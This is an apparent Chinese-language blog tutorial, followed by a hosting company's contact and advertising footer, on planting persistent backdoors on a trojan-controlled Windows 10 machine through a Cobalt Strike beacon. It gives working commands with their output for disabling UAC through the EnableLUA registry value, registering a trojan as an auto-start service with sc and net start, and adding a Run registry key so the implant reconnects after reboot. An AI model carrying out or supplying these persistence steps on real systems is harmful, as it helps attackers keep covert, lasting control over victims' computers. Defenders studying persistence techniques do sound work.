关于注册表后门的总结

2020/10/14 13:05:00

注册表后门需要哪些步骤?


准备环境

windows10 虚拟机

Cobalt Strike【这里部署在Windows10上,服务器置于云上】


过程

远程木马控制了windows10虚拟机,利用Cobalt Strike

 

在Cobalt Strike下进入beacon

1.png

1.png

1.png

1.png


比较说明【可执行文件留持久后门】

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 的值改为0

把这个值改成0,这样在自己的电脑上操作才是真正的administrators

查询注册表信息        

 

shell reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"

 

EnableLUA 设置为1

1.png

1.png

EnableLUA 设置为0

1.png

1.png


beacon> shell sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"  【填写自己木马路径】

[*] Tasked beacon to run: sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"

[+] host called home, sent: 94 bytes

[+] received output:

[SC] CreateService 成功

beacon> shell sc description "test" "测试"      【设置服务的描述】

[*] Tasked beacon to run: sc description "test" "测试"

[+] host called home, sent: 59 bytes

[+] received output:

[SC] ChangeServiceConfig2 成功

beacon> shell sc config "test" start= auto   【设置服务自启动】

[*] Tasked beacon to run: sc config "test" start= auto

[+] host called home, sent: 59 bytes

[+] received output:

[SC] ChangeServiceConfig 成功

beacon> shell net start "test"        [启动服务]

[*] Tasked beacon to run: net start "test"

[+] host called home, sent: 47 bytes

[+] received output:

结果上线!!!

或者

直接插入注册表里,成为自启动文件

继续——添加后门生成

 

shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\calmness\calmnexx.exe" /f

1.png

重启大法

1.png


依旧上线

1.png

 

补充一点:

beacon> shell cmd /k dir

 

[*] Tasked beacon to run: cmd /k dir

 

[+] host called home, sent: 41 bytes

 

[+] received output:

驱动器 C 中的卷没有标签

 

卷的序列号是 88B7-95BE

 

C:\Users\calmness\Desktop 的目录

 

2020/09/21  13:07    <DIR> 



4000-618-418

免费客户服务热线:4000-618-418   027-87315200  87315211  业务咨询:18062150949  18942945673(微信同号)
业务咨询QQ:   欢迎光临老兵IDC6520895  欢迎光临老兵IDC42582633  欢迎光临老兵IDC13640069   
技术支持QQ:欢迎光临网盾科技908624   技术支持电话:15307140247(微信同号)

公司地址:湖北省武汉市东湖高新技术开发区华师园北路18号光谷科技港1B栋4楼

 鄂网公安备案 42010602000334号  鄂ICP备2020015892号-5

《中华人民共和国增值电信业务经营许可证》IDC/ISP/云计算牌照编号:鄂B1-20160016  全网IDC/ISP/VPN虚拟专网证编号:B1-20182826
Copyright © 2007- 武汉老兵云信息技术有限公司(网盾科技IDC部门) All rights reserved.

老兵IDC提供混拨、动态IP服务器、混拨VPS、全国换IP爬虫混拨VPS、PPTP拨号、自动拨号服务器、网赚跑号投票爬虫采集服务器等,是专业的企业动态云主机拨号VPS供应商。

请所有客户积极遵守《中华人民共和国网络安全法》要求,合理合规的使用老兵IDC的各类IDC云服务产品,必须实名认证,用户行为有相应的日志记录。请不要存在侥幸心理,网盾科技会遵照安全策略管理和安全制度的执行,营造良好的安全环境为客户创造良好的业务。

老兵IDC承诺:购买我们的各类IDC云产品,客户方(企业客户如有法人或股东)只需出示有效军人退伍证明,一律折上折,具体折扣咨询客服。